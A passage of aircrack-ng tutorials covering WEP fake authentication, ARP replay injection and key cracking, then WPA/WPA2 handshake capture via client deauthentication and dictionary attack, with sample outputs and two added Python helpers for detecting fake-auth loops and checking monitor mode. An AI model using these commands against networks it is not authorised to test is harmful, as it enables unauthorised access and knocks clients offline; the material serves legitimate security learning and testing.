 00:14:6C:7E:40:80  00:0F:B5:88:AC:82   42     0   183782  

Step 4 - Use aireplay-ng to do a fake authentication with the access point

In order for an access point to accept a packet, the source MAC address must already be associated. If the source MAC address you are injecting is not associated then the AP ignores the packet and sends out a DeAuthentication packet in cleartext. In this state, no new IVs are created because the AP is ignoring all the injected packets.

The lack of association with the access point is the single biggest reason why injection fails. Remember the golden rule: The MAC you use for injection must be associated with the AP by either using fake authentication or using a MAC from an already-associated client.

To associate with an access point, use fake authentication:

 aireplay-ng -1 0 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0

Where:

    -1 means fake authentication
    0 is the reassociation timing in seconds
    -e teddy is the wireless network name
    -a 00:14:6C:7E:40:80 is the access point MAC address
    -h 00:0F:B5:88:AC:82 is our card's MAC address
    ath0 is the wireless interface name

Success looks like:

18:18:20  Sending Authentication Request
18:18:20  Authentication successful
18:18:20  Sending Association Request
18:18:20  Association successful :-)

Or another variation for picky access points:

aireplay-ng -1 6000 -o 1 -q 10 -e teddy -a 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0

Where:

    6000 - Reauthenticate every 6000 seconds. The long period also causes keep alive packets to be sent.
    -o 1 - Send only one set of packets at a time. Default is multiple and this confuses some APs.
    -q 10 - Send keep alive packets every 10 seconds.

Success looks like:

18:22:32  Sending Authentication Request
18:22:32  Authentication successful
18:22:32  Sending Association Request
18:22:32  Association successful :-)
18:22:42  Sending keep-alive packet
18:22:52  Sending keep-alive packet
# and so on.

Here is an example of what a failed authentication looks like:

18:28:02  Sending Authentication Request
18:28:02  Authentication successful
18:28:02  Sending Association Request
18:28:02  Association successful :-)
18:28:02  Got a deauthentication packet!
18:28:05  Sending Authentication Request
18:28:05  Authentication successful
18:28:05  Sending Association Request
18:28:10  Sending Authentication Request
18:28:10  Authentication successful
18:28:10  Sending Association Request

Notice the Got a deauthentication packet and the continuous retries above. Do not proceed to the next step until you have the fake authentication running correctly.
Troubleshooting Tips

    Some access points are configured to only allow selected MAC addresses to associate and connect. If this is the case, you will not be able to successfully do fake authentication unless you know one of the MAC addresses on the allowed list. If you suspect this is the problem, use the following command while trying to do fake authentication. Start another session and

Run: tcpdump -n -vvv -s0 -e -i <interface name> | grep -i -E "(RA:<MAC address of your card>|Authentication|ssoc)"

You would then look for error messages.

    If at any time you wish to confirm you are properly associated, use tcpdump and look at the packets. Start another session and

Run: tcpdump -n -e -s0 -vvv -i ath0

Here is a typical tcpdump error message you are looking for:

 11:04:34.360700 314us BSSID:00:14:6c:7e:40:80 DA:00:0F:B5:88:AC:82 SA:00:14:6c:7e:40:80   DeAuthentication: Class 3 frame received from nonassociated station

Notice that the access point (00:14:6c:7e:40:80) is telling the source (00:0F:B5:88:AC:82) you are not associated. Meaning, the AP will not process or accept the injected packets.

If you want to select only the DeAuth packets with tcpdump then you can use: tcpdump -n -e -s0 -vvv -i ath0 | grep -i DeAuth. You may need to tweak the phrase DeAuth to pick out the exact packets you want.
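Seen from the defender's side, the same tcpdump output reveals both failure modes described above: a station being told it is not associated (the class-3 DeAuthentication line) and a station re-authenticating in a loop. The following Python, an added example that is not part of aircrack-ng, parses such lines and reports both patterns per AP and station; the log lines inside it are constructed to follow the tcpdump -e layout shown above.

```python
"""Flag fake-authentication loops and unassociated injection in tcpdump output.

Added example, not aircrack-ng code. It reads 802.11 management frames as
printed by `tcpdump -n -e -s0 -vvv -i ath0` on a monitor-mode interface;
the log lines below are constructed to follow that layout.
"""
import re
from collections import defaultdict

# Timestamp, optional airtime ("314us"), the BSSID/DA/SA triple that tcpdump -e
# prints for 802.11 frames, then the frame description.
LINE_RE = re.compile(
    r"^(?P<ts>\d\d:\d\d:\d\d\.\d+)\s+(?:\d+us\s+)?"
    r"BSSID:(?P<bssid>[0-9a-f:]{17})\s+DA:(?P<da>[0-9a-f:]{17})\s+"
    r"SA:(?P<sa>[0-9a-f:]{17})\s+(?P<frame>.*)$", re.IGNORECASE)


def hms_to_seconds(ts):
    """'18:28:02.001000' -> seconds since midnight."""
    h, m, s = ts.split(":")
    return int(h) * 3600 + int(m) * 60 + float(s)


def parse_line(line):
    """Return the frame's fields (MACs lower-cased) or None for other lines."""
    m = LINE_RE.match(line.strip())
    if m is None:
        return None
    fields = m.groupdict()
    for key in ("bssid", "da", "sa"):
        fields[key] = fields[key].lower()
    fields["seconds"] = hms_to_seconds(fields["ts"])
    return fields


def max_in_window(times, window):
    """Largest number of sorted timestamps inside any window-second span."""
    best, start = 0, 0
    for end, t in enumerate(times):
        while t - times[start] > window:
            start += 1
        best = max(best, end - start + 1)
    return best


def analyse(lines, window=30.0, auth_threshold=3):
    """Return findings as (kind, bssid, station, count) tuples.

    "unassociated-injection": the AP answered a station with the class-3
    DeAuthentication shown above, i.e. the station sends data without being
    associated. "auth-loop": a station sent at least auth_threshold
    Authentication requests within `window` seconds, the retry pattern that a
    failing fake authentication produces.
    """
    class3 = defaultdict(int)
    auth_times = defaultdict(list)
    for line in lines:
        f = parse_line(line)
        if f is None:
            continue
        frame = f["frame"]
        if frame.startswith("DeAuthentication") and "nonassociated" in frame:
            class3[(f["bssid"], f["da"])] += 1
        elif frame.startswith("Authentication") and frame.endswith("-1:"):
            # sequence number 1 is the station's request, 2 the AP's reply
            auth_times[(f["bssid"], f["sa"])].append(f["seconds"])
    findings = []
    for (bssid, sta), n in sorted(class3.items()):
        findings.append(("unassociated-injection", bssid, sta, n))
    for (bssid, sta), times in sorted(auth_times.items()):
        burst = max_in_window(sorted(times), window)
        if burst >= auth_threshold:
            findings.append(("auth-loop", bssid, sta, burst))
    return findings


# Constructed sample: one station re-authenticating every few seconds and being
# told it is not associated, one ordinary client, one beacon.
SAMPLE_LOG = """\
18:28:02.001000 BSSID:00:14:6c:7e:40:80 DA:00:14:6c:7e:40:80 SA:00:0f:b5:88:ac:82 Authentication (Open System)-1:
18:28:02.003000 BSSID:00:14:6c:7e:40:80 DA:00:0f:b5:88:ac:82 SA:00:14:6c:7e:40:80 Authentication (Open System)-2:
18:28:02.005000 BSSID:00:14:6c:7e:40:80 DA:00:14:6c:7e:40:80 SA:00:0f:b5:88:ac:82 Assoc Request (teddy) [1.0 2.0 5.5 11.0 Mbit]
18:28:02.010000 314us BSSID:00:14:6c:7e:40:80 DA:00:0F:B5:88:AC:82 SA:00:14:6c:7e:40:80   DeAuthentication: Class 3 frame received from nonassociated station
18:28:05.001000 BSSID:00:14:6c:7e:40:80 DA:00:14:6c:7e:40:80 SA:00:0f:b5:88:ac:82 Authentication (Open System)-1:
18:28:10.001000 BSSID:00:14:6c:7e:40:80 DA:00:14:6c:7e:40:80 SA:00:0f:b5:88:ac:82 Authentication (Open System)-1:
18:28:15.002000 314us BSSID:00:14:6c:7e:40:80 DA:00:0F:B5:88:AC:82 SA:00:14:6c:7e:40:80   DeAuthentication: Class 3 frame received from nonassociated station
18:29:00.000000 BSSID:00:14:6c:7e:40:80 DA:00:14:6c:7e:40:80 SA:00:0f:b5:fd:fb:c2 Authentication (Open System)-1:
18:29:01.000000 BSSID:00:14:6c:7e:40:80 DA:ff:ff:ff:ff:ff:ff SA:00:14:6c:7e:40:80 Beacon (teddy) [1.0 2.0 5.5 11.0 Mbit] ESS CH: 9, PRIVACY
"""

if __name__ == "__main__":
    for kind, bssid, station, count in analyse(SAMPLE_LOG.splitlines()):
        print("%s: AP %s, station %s, %d frames" % (kind, bssid, station, count))
```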
Step 5 - Start aireplay-ng in ARP request replay mode

The purpose of this step is to start aireplay-ng in a mode which listens for ARP requests then reinjects them back into the network. For an explanation of ARP, see this PC Magazine page or Wikipedia. The reason we select ARP request packets is because the AP will normally rebroadcast them and generate a new IV. Again, this is our objective, to obtain a large number of IVs in a short period of time.

Open another console session and enter:

 aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 ath0

It will start listening for ARP requests and when it hears one, aireplay-ng will immediately start to inject it. See the Generating ARPs section for tricks on generating ARPs if your screen says got 0 ARP requests after waiting a long time.

Here is what the screen looks like when ARP requests are being injected:

 Saving ARP requests in replay_arp-0321-191525.cap
 You should also start airodump-ng to capture replies.
 Read 629399 packets (got 316283 ARP requests), sent 210955 packets...

You can confirm that you are injecting by checking your airodump-ng screen. The data packets should be increasing rapidly. The #/s should be a decent number. However, decent depends on a large variety of factors. A typical range is 300 to 400 data packets per second. It can be as low as 100/second and as high as 500/second.
Troubleshooting Tips

    If you receive a message similar to Got a deauth/disassoc packet. Is the source mac associated?, this means you have lost association with the AP. All your injected packets will be ignored. You must return to the fake authentication step (Step 4) and successfully associate with the AP.

Step 6 - Run aircrack-ng to obtain the WEP key

The purpose of this step is to obtain the WEP key from the IVs gathered in the previous steps.

Note: For learning purposes, you should use a 64 bit WEP key on your AP to speed up the cracking process. If this is the case, then you can include -n 64 to limit the checking of keys to 64 bits.

Two methods will be shown. It is recommended you try both for learning purposes. By trying both methods, you will see how quickly the PTW method determines the WEP key compared to the FMS/KoreK method. As a reminder, the PTW method only works successfully with ARP request/reply packets. Since this tutorial covers injection of ARP request packets, you can properly use this method. The other requirement is that you capture the full packet with airodump-ng, meaning do not use the --ivs option.

Start another console session and enter:

 aircrack-ng -b 00:14:6C:7E:40:80 output*.cap

Where:

    -b 00:14:6C:7E:40:80 selects the one access point we are interested in. This is optional since when we originally captured the data, we applied a filter to only capture data for this one AP.
    output*.cap selects all files starting with output and ending in .cap.

To also use the FMS/Korek method, start another console session and enter:

 aircrack-ng -K -b 00:14:6C:7E:40:80 output*.cap

Where:

    -K invokes the FMS/Korek method
    -b 00:14:6C:7E:40:80 selects the one access point we are interested in. This is optional since when we originally captured the data, we applied a filter to only capture data for this one AP.
    output*.cap selects all files starting with output and ending in .cap.

If you are using 1.0-rc1, add the option -K for the FMS/KoreK attack. (1.0-rc1 defaults to PTW.)

You can run this while generating packets. In a short time, the WEP key will be calculated and presented. You will need approximately 250,000 IVs for 64 bit and 1,500,000 IVs for 128 bit keys. If you are using the PTW attack, then you will need about 20,000 packets for 64-bit and 40,000 to 85,000 packets for 128 bit. These are very approximate and there are many variables as to how many IVs you actually need to crack the WEP key.

Here is what success looks like:

                                              Aircrack-ng 0.9
 
 
                              [00:03:06] Tested 674449 keys (got 96610 IVs)
 
 KB    depth   byte(vote)
  0    0/  9   12(  15) F9(  15) 47(  12) F7(  12) FE(  12) 1B(   5) 77(   5) A5(   3) F6(   3) 03(   0) 
  1    0/  8   34(  61) E8(  27) E0(  24) 06(  18) 3B(  16) 4E(  15) E1(  15) 2D(  13) 89(  12) E4(  12) 
  2    0/  2   56(  87) A6(  63) 15(  17) 02(  15) 6B(  15) E0(  15) AB(  13) 0E(  10) 17(  10) 27(  10) 
  3    1/  5   78(  43) 1A(  20) 9B(  20) 4B(  17) 4A(  16) 2B(  15) 4D(  15) 58(  15) 6A(  15) 7C(  15) 
 
                       KEY FOUND! [ 12:34:56:78:90 ] 
      Probability: 100%

Notice that in this case it took far fewer than the estimated 250,000 IVs to crack the key. (For this example, the FMS/KoreK attack was used.)
General Troubleshooting

    Be sure to read all the documentation on the Wiki for the various commands used in this tutorial.
    See Tutorial: I am injecting but the IVs don't increase

Generating ARPs

In order for this tutorial to work, you must receive at least one ARP packet. On your home network, here is an easy way to generate an ARP packet. On a wired or wireless PC, ping a non-existent IP on your home LAN. A wired PC means a PC connected to your LAN via an Ethernet cable. Let's say your home LAN address space is 192.168.1.1 through 192.168.1.254. Pick an IP between 1 and 254 which is not assigned to a network device. For example, if the IP 192.168.1.213 is not being used then ping 192.168.1.213. This will cause an ARP to be broadcast via your wireless access point and in turn, this will kick off the reinjection of packets by aireplay-ng.

################################################################

Tutorial: How to Crack WPA/WPA2

Version: 1.20 March 07, 2010
By: darkAudax
Introduction

This tutorial walks you through cracking WPA/WPA2 networks which use pre-shared keys. I recommend you do some background reading to better understand what WPA/WPA2 is. The Wiki links page has a WPA/WPA2 section. The best document describing WPA is Wi-Fi Security - WEP, WPA and WPA2. This is the link to download the PDF directly. The WPA Packet Capture Explained tutorial is a companion to this tutorial.

WPA/WPA2 supports many types of authentication beyond pre-shared keys. aircrack-ng can ONLY crack pre-shared keys. So make sure airodump-ng shows the network as having the authentication type of PSK, otherwise, don't bother trying to crack it.

There is another important difference between cracking WPA/WPA2 and WEP: the approach used to crack the WPA/WPA2 pre-shared key. Unlike WEP, where statistical methods can be used to speed up the cracking process, only plain brute force techniques can be used against WPA/WPA2. That is because the key is not static, so collecting IVs, as when cracking WEP encryption, does not speed up the attack. The only thing that gives you the information to start an attack is the handshake between client and AP. Handshaking is done when the client connects to the network. Although not absolutely true, for the purposes of this tutorial, consider it true. Since the pre-shared key can be from 8 to 63 characters in length, it effectively becomes impossible to crack the pre-shared key.

The only time you can crack the pre-shared key is if it is a dictionary word or relatively short in length. Conversely, if you want to have an unbreakable wireless network at home, use WPA/WPA2 and a 63 character password composed of random characters including special symbols.

The impact of having to use a brute force approach is substantial. Because it is very compute intensive, a computer can only test 50 to 300 possible keys per second depending on the computer CPU. It can take hours, if not days, to crunch through a large dictionary. If you are thinking about generating your own password list to cover all the permutations and combinations of characters and special symbols, check out this brute force time calculator first. You will be very surprised at how much time is required.

IMPORTANT: This means that the passphrase must be contained in the dictionary you are using to break WPA/WPA2. If it is not in the dictionary then aircrack-ng will be unable to determine the key.

There is no difference between cracking WPA or WPA2 networks. The authentication methodology is basically the same between them. So the techniques you use are identical.

It is recommended that you experiment with your home wireless access point to get familiar with these ideas and techniques. If you do not own a particular access point, please remember to get permission from the owner prior to playing with it.

Please send me any constructive feedback, positive or negative. Additional troubleshooting ideas and tips are especially welcome.
Assumptions

First, this solution assumes:

    You are using drivers patched for injection. Use the injection test to confirm your card can inject.
    You are physically close enough to send and receive access point and wireless client packets. Remember that just because you can receive packets from them does not mean you will be able to transmit packets to them. The wireless card strength is typically less than the AP strength. So you have to be physically close enough for your transmitted packets to reach and be received by both the AP and the wireless client. You can confirm that you can communicate with the specific AP by following these instructions.
    You are using v0.9.1 or above of aircrack-ng. If you use a different version then some of the command options may have to be changed.

Ensure all of the above assumptions are true, otherwise the advice that follows will not work. In the examples below, you will need to change ath0 to the interface name which is specific to your wireless card.
Equipment used

In this tutorial, here is what was used:

    MAC address of PC running aircrack-ng suite: 00:0F:B5:88:AC:82
    MAC address of the wireless client using WPA2: 00:0F:B5:FD:FB:C2
    BSSID (MAC address of access point): 00:14:6C:7E:40:80
    ESSID (Wireless network name): teddy
    Access point channel: 9
    Wireless interface: ath0

You should gather the equivalent information for the network you will be working on. Then just change the values in the examples below to the specific network.
Solution
Solution Overview

The objective is to capture the WPA/WPA2 authentication handshake and then use aircrack-ng to crack the pre-shared key.

This can be done either actively or passively. Actively means you will accelerate the process by deauthenticating an existing wireless client. Passively means you simply wait for a wireless client to authenticate to the WPA/WPA2 network. The advantage of passive is that you don't actually need injection capability and thus the Windows version of aircrack-ng can be used.

Here are the basic steps we will be going through:

    Start the wireless interface in monitor mode on the specific AP channel
    Start airodump-ng on AP channel with filter for bssid to collect authentication handshake
    Use aireplay-ng to deauthenticate the wireless client
    Run aircrack-ng to crack the pre-shared key using the authentication handshake

Step 1 - Start the wireless interface in monitor mode

The purpose of this step is to put your card into what is called monitor mode. Monitor mode is the mode whereby your card can listen to every packet in the air. Normally your card will only hear packets addressed to you. By hearing every packet, we can later capture the WPA/WPA2 4-way handshake. As well, it will allow us to optionally deauthenticate a wireless client in a later step.

The exact procedure for enabling monitor mode varies depending on the driver you are using. To determine the driver (and the correct procedure to follow), run the following command:

 airmon-ng

On a machine with a Ralink, an Atheros and a Broadcom wireless card installed, the system responds:

 Interface       Chipset         Driver
 
 rausb0          Ralink RT73     rt73
 wlan0           Broadcom        b43 - [phy0]
 wifi0           Atheros         madwifi-ng
 ath0            Atheros         madwifi-ng VAP (parent: wifi0)

The presence of a [phy0] tag at the end of the driver name is an indicator for mac80211, so the Broadcom card is using a mac80211 driver. Note that mac80211 is supported only since aircrack-ng v1.0-rc1, and it won't work with v0.9.1. Both entries of the Atheros card show madwifi-ng as the driver - follow the madwifi-ng-specific steps to set up the Atheros card. Finally, the Ralink shows neither of these indicators, so it is using an ieee80211 driver - see the generic instructions for setting it up.
Step 1a - Setting up madwifi-ng

First stop ath0 by entering:

 airmon-ng stop ath0   

The system responds:

 Interface       Chipset         Driver
 
 wifi0           Atheros         madwifi-ng
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (VAP destroyed)

Enter iwconfig to ensure there are no other athX interfaces. It should look similar to this:

 lo        no wireless extensions.
 
 eth0      no wireless extensions.
 
 wifi0     no wireless extensions.

If there are any remaining athX interfaces, then stop each one. When you are finished, run iwconfig to ensure there are none left.

Now, enter the following command to start the wireless card on channel 9 in monitor mode:

 airmon-ng start wifi0 9

Note: In this command we use wifi0 instead of our wireless interface of ath0. This is because the madwifi-ng drivers are being used.

The system will respond:

 Interface       Chipset         Driver
 
 wifi0           Atheros         madwifi-ng
 ath0            Atheros         madwifi-ng VAP (parent: wifi0) (monitor mode enabled)

You will notice that ath0 is reported above as being put into monitor mode.

To confirm the interface is properly setup, enter iwconfig.

The system will respond:

 lo        no wireless extensions.
 
 wifi0     no wireless extensions.
 
 eth0      no wireless extensions.
 
 ath0      IEEE 802.11g  ESSID:""  Nickname:""
        Mode:Monitor  Frequency:2.452 GHz  Access Point: 00:0F:B5:88:AC:82   
        Bit Rate:0 kb/s   Tx-Power:18 dBm   Sensitivity=0/3  
        Retry:off   RTS thr:off   Fragment thr:off
        Encryption key:off
        Power Management:off
        Link Quality=0/94  Signal level=-95 dBm  Noise level=-95 dBm
        Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
        Tx excessive retries:0  Invalid misc:0   Missed beacon:0

In the response above, you can see that ath0 is in monitor mode, on the 2.452GHz frequency which is channel 9 and the Access Point shows the MAC address of your wireless card. Only the madwifi-ng drivers show the card MAC address in the AP field, other drivers do not. So everything is good. It is important to confirm all this information prior to proceeding, otherwise the following steps will not work properly.

To match the frequency to the channel, check out: http://www.cisco.com/en/US/docs/wireless/technology/channel/deployment/guide/Channel.html#wp134132 . This will give you the frequency for each channel.
Step 1b - Setting up mac80211 drivers

Unlike madwifi-ng, you do not need to remove the wlan0 interface when setting up mac80211 drivers. Instead, use the following command to set up your card in monitor mode on channel 9:

 airmon-ng start wlan0 9

The system responds:

 Interface       Chipset         Driver
 
 wlan0           Broadcom        b43 - [phy0]
                                 (monitor mode enabled on mon0)

Notice that airmon-ng enabled monitor mode on mon0. So, the correct interface name to use in later parts of the tutorial is mon0. wlan0 is still in regular (managed) mode, and can be used as usual, provided that the AP that wlan0 is connected to is on the same channel as the AP you are attacking, and you are not performing any channel-hopping.

To confirm successful setup, run iwconfig. The following output should appear:

 lo        no wireless extensions.

 eth0      no wireless extensions.
 
 wmaster0  no wireless extensions.
 
 wlan0     IEEE 802.11bg  ESSID:""
           Mode:Managed  Frequency:2.452 GHz  Access Point: Not-Associated
           Tx-Power=0 dBm
           Retry min limit:7   RTS thr:off   Fragment thr=2352 B
           Encryption key:off
           Power Management:off
           Link Quality:0  Signal level:0  Noise level:0
           Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
           Tx excessive retries:0  Invalid misc:0   Missed beacon:0
 
 mon0      IEEE 802.11bg  Mode:Monitor  Frequency:2.452 GHz  Tx-Power=0 dBm
           Retry min limit:7   RTS thr:off   Fragment thr=2352 B
           Encryption key:off
           Power Management:off
           Link Quality:0  Signal level:0  Noise level:0
           Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
           Tx excessive retries:0  Invalid misc:0   Missed beacon:0

Here, mon0 is seen as being in monitor mode, on channel 9 (2.452 GHz). Unlike madwifi-ng, the monitor interface has no Access Point field at all. Also notice that wlan0 is still present, and in managed mode - this is normal. Because both interfaces share a common radio, they must always be tuned to the same channel - changing the channel on one interface also changes it on the other.
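The "confirm mode and channel before proceeding" check above can be scripted. This is an added example, not part of aircrack-ng: it parses iwconfig output, converts the reported frequency to a channel number (the same mapping as the Cisco channel table linked earlier) and verifies that the chosen interface is in Monitor mode on the expected channel. The sample text is the mon0/wlan0 output reproduced from this tutorial.

```python
"""Verify from iwconfig output that an interface is in monitor mode on a given channel."""
import re

# iwconfig output as shown in the tutorial above (constructed sample for this example)
SAMPLE_IWCONFIG = """
lo        no wireless extensions.

eth0      no wireless extensions.

wmaster0  no wireless extensions.

wlan0     IEEE 802.11bg  ESSID:""
          Mode:Managed  Frequency:2.452 GHz  Access Point: Not-Associated
          Tx-Power=0 dBm
          Retry min limit:7   RTS thr:off   Fragment thr=2352 B
          Encryption key:off

mon0      IEEE 802.11bg  Mode:Monitor  Frequency:2.452 GHz  Tx-Power=0 dBm
          Retry min limit:7   RTS thr:off   Fragment thr=2352 B
          Encryption key:off
"""


def freq_to_channel(freq_ghz: float) -> int:
    """Map an 802.11 centre frequency to its channel number.

    2.4 GHz band: channels 1-13 are 5 MHz apart starting at 2.412 GHz
    (channel = (MHz - 2407) / 5); channel 14 sits at 2.484 GHz.
    5 GHz band: channel = (MHz - 5000) / 5, e.g. 5.180 GHz is channel 36.
    """
    mhz = round(freq_ghz * 1000)
    if mhz == 2484:
        return 14
    if 2412 <= mhz <= 2472 and (mhz - 2407) % 5 == 0:
        return (mhz - 2407) // 5
    if 5000 < mhz < 6000 and mhz % 5 == 0:
        return (mhz - 5000) // 5
    raise ValueError(f"not a known 802.11 frequency: {freq_ghz} GHz")


def parse_iwconfig(text: str) -> dict:
    """Return {interface: {"mode": str|None, "channel": int|None}} for each wireless interface."""
    interfaces = {}
    current = None
    for line in text.splitlines():
        if not line.strip():
            continue
        if not line[0].isspace():
            # A line starting in column 0 opens a new interface stanza.
            name, _, rest = line.partition(" ")
            if "no wireless extensions" in rest:
                current = None          # wired interface: skip its stanza
                continue
            current = interfaces.setdefault(name, {"mode": None, "channel": None})
            line = rest
        if current is None:
            continue
        mode = re.search(r"Mode:(\w+)", line)
        if mode:
            current["mode"] = mode.group(1)
        freq = re.search(r"Frequency:([\d.]+) GHz", line)
        if freq:
            current["channel"] = freq_to_channel(float(freq.group(1)))
    return interfaces


def monitor_ready(text: str, iface: str, channel: int) -> bool:
    """True only if iface is in Monitor mode and tuned to the expected channel."""
    info = parse_iwconfig(text).get(iface)
    return bool(info) and info["mode"] == "Monitor" and info["channel"] == channel


if __name__ == "__main__":
    for name, info in parse_iwconfig(SAMPLE_IWCONFIG).items():
        print(f"{name}: mode={info['mode']} channel={info['channel']}")
    print("mon0 ready on channel 9:", monitor_ready(SAMPLE_IWCONFIG, "mon0", 9))
```

On a live system, feed it the real output with `parse_iwconfig(subprocess.run(["iwconfig"], capture_output=True, text=True).stdout)`.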
Step 1c - Setting up other drivers

For other (ieee80211-based) drivers, simply run the following command to enable monitor mode (replace rausb0 with your interface name):

 airmon-ng start rausb0 9

The system responds:

 Interface       Chipset         Driver
 
 rausb0          Ralink          rt73 (monitor mode enabled)

At this point, the interface should be ready to use.
Step 2 - Start airodump-ng to collect authentication handshake

The purpose of this step is to run airodump-ng to capture the 4-way authentication handshake for the AP we are interested in.

Enter:

 airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk ath0

Where:

    -c 9 is the channel for the wireless network
    --bssid 00:14:6C:7E:40:80 is the access point MAC address. This eliminates extraneous traffic.
    -w psk is the file name prefix for the file which will contain the IVs.
    ath0 is the interface name.

Important: Do NOT use the --ivs option. You must capture the full packets.

Here is what it looks like if a wireless client is connected to the network:

  CH  9 ][ Elapsed: 4 s ][ 2007-03-24 16:58 ][ WPA handshake: 00:14:6C:7E:40:80
                                                                                                               
  BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
                                                                                                               
  00:14:6C:7E:40:80   39 100       51      116   14   9  54  WPA2 CCMP   PSK  teddy                           
                                                                                                               
  BSSID              STATION            PWR  Lost  Packets  Probes                                             
                                                                                                               
  00:14:6C:7E:40:80  00:0F:B5:FD:FB:C2   35     0      116  

In the screen above, notice the WPA handshake: 00:14:6C:7E:40:80 in the top right-hand corner. This means airodump-ng has successfully captured the four-way handshake.

Here it is with no connected wireless clients:

  CH  9 ][ Elapsed: 4 s ][ 2007-03-24 17:51 
                                                                                                               
  BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB  ENC  CIPHER AUTH ESSID
                                                                                                               
  00:14:6C:7E:40:80   39 100       51        0    0   9  54  WPA2 CCMP   PSK  teddy                           
                                                                                                               
  BSSID              STATION            PWR  Lost  Packets  Probes                                             

Troubleshooting Tip

See the Troubleshooting Tips section below for ideas.

There are two ways to see if you captured any handshake packets. First, watch the airodump-ng screen for WPA handshake: 00:14:6C:7E:40:80 in the top right-hand corner. This means a four-way handshake was successfully captured. See just above for an example screenshot.

Second, use Wireshark and apply a filter of eapol. This displays only the EAPOL packets you are interested in, so you can see whether the capture contains 0, 1, 2, 3 or 4 EAPOL packets.
Step 3 - Use aireplay-ng to deauthenticate the wireless client

This step is optional. If you are patient, you can wait until airodump-ng captures a handshake when one or more clients connect to the AP. You only perform this step if you opted to actively speed up the process. The other constraint is that there must be a wireless client currently associated with the AP. If there is no wireless client currently associated with the AP, then you have to be patient and wait for one to connect to the AP so that a handshake can be captured. Needless to say, if a wireless client shows up later and airodump-ng did not capture the handshake, you can backtrack and perform this step.

This step sends a message to the wireless client saying that it is no longer associated with the AP. The wireless client will then hopefully reauthenticate with the AP. The reauthentication is what generates the 4-way authentication handshake we are interested in collecting. This is what we use to break the WPA/WPA2 pre-shared key.

Based on the output of airodump-ng in the previous step, you determine a client which is currently connected. You need the MAC address for the following. Open another console session and enter:

 aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 ath0

Where:

    -0 means deauthentication
    1 is the number of deauths to send (you can send multiple if you wish)
    -a 00:14:6C:7E:40:80 is the MAC address of the access point
    -c 00:0F:B5:FD:FB:C2 is the MAC address of the client you are deauthing
    ath0 is the interface name

Here is what the output looks like:

 11:09:28  Sending DeAuth to station   -- STMAC: [00:0F:B5:34:30:30]

With luck this causes the client to reauthenticate and yield the 4-way handshake.
Troubleshooting Tips

    The deauthentication packets are sent directly from your PC to the clients. So you must be physically close enough to the clients for your wireless card transmissions to reach them. To confirm the client received the deauthentication packets, use tcpdump or similar to look for ACK packets back from the client. If you did not get an ACK packet back, then the client did not hear the deauthentication packet.

Step 4 - Run aircrack-ng to crack the pre-shared key

The purpose of this step is to actually crack the WPA/WPA2 pre-shared key. To do this, you need a dictionary of words as input. Basically, aircrack-ng takes each word and tests to see if this is in fact the pre-shared key.

There is a small dictionary that comes with aircrack-ng - password.lst. This file can be found in the test directory of the aircrack-ng source code. The Wiki FAQ has an extensive list of dictionary sources. You can use John the Ripper (JTR) to generate your own list and pipe them into aircrack-ng. Using JTR in conjunction with aircrack-ng is beyond the scope of this tutorial.

Open another console session and enter:

 aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk*.cap

Where:

    -w password.lst is the name of the dictionary file. Remember to specify the full path if the file is not located in the same directory.
    -b 00:14:6C:7E:40:80 is the access point MAC address (the BSSID), the same one given to airodump-ng in step 2.
    psk*.cap is the name of the group of files containing the captured packets. Notice in this case that we used the wildcard * to include multiple files.

Here is typical output when there are no handshakes found:

 Opening psk-01.cap
 Opening psk-02.cap
 Opening psk-03.cap
 Opening psk-04.cap
 Read 1827 packets.

 No valid WPA handshakes found.

When this happens you either have to redo step 3 (deauthenticating the wireless client) or wait longer if you are using the passive approach. When using the passive approach, you have to wait until a wireless client authenticates to the AP.

Here is typical output when handshakes are found:

 Opening psk-01.cap
 Opening psk-02.cap
 Opening psk-03.cap
 Opening psk-04.cap
 Read 1827 packets.
 
 #  BSSID              ESSID                     Encryption

 1  00:14:6C:7E:40:80  teddy                     WPA (1 handshake)
 
 Choosing first network as target.

Now at this point, aircrack-ng will start attempting to crack the pre-shared key. Depending on the speed of your CPU and the size of the dictionary, this could take a long time, even days.

Here is what successfully cracking the pre-shared key looks like:

                               Aircrack-ng 0.8
 
 
                 [00:00:00] 2 keys tested (37.20 k/s)
 
 
                         KEY FOUND! [ 12345678 ]
 
 
    Master Key     : CD 69 0D 11 8E AC AA C5 C5 EC BB 59 85 7D 49 3E 
                     B8 A6 13 C5 4A 72 82 38 ED C3 7E 2C 59 5E AB FD 
 
    Transcient Key : 06 F8 BB F3 B1 55 AE EE 1F 66 AE 51 1F F8 12 98 
                     CE 8A 9D A0 FC ED A6 DE 70 84 BA 90 83 7E CD 40 
                     FF 1D 41 E1 65 17 93 0E 64 32 BF 25 50 D5 4A 5E 
                     2B 20 90 8C EA 32 15 A6 26 62 93 27 66 66 E0 71 
 
    EAPOL HMAC     : 4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB 

Troubleshooting Tips
I Cannot Capture the Four-way Handshake!

It can sometimes be tricky to capture the four-way handshake. Here are some troubleshooting tips to address this:

    Your monitor card must be in the same mode as both the client and the Access Point. So, for example, if your card was in B mode and the client/AP were using G mode, then you would not capture the handshake. This is especially important for new APs and clients which may use turbo mode and/or other new standards. Some drivers allow you to specify the mode. Also, iwconfig has a modulation option that can sometimes be used; do man iwconfig to see the options for modulation. For reference, 1, 2, 5.5 and 11 Mbit are 'b'; 6, 9, 12, 18, 24, 36, 48 and 54 Mbit are 'g'.
    Sometimes you also need to set the monitor-mode card to the same speed, i.e. auto, 1MB, 2MB, 11MB, 54MB, etc.
    Be sure that your capture card is locked to the same channel as the AP. You can do this by specifying -c <channel of AP> when you start airodump-ng.
    Be sure there are no connection managers running on your system. These can change channels and/or change mode without your knowledge.
    Make sure you are physically close enough to receive both access point and wireless client packets. The wireless card's signal strength is typically less than the AP's.
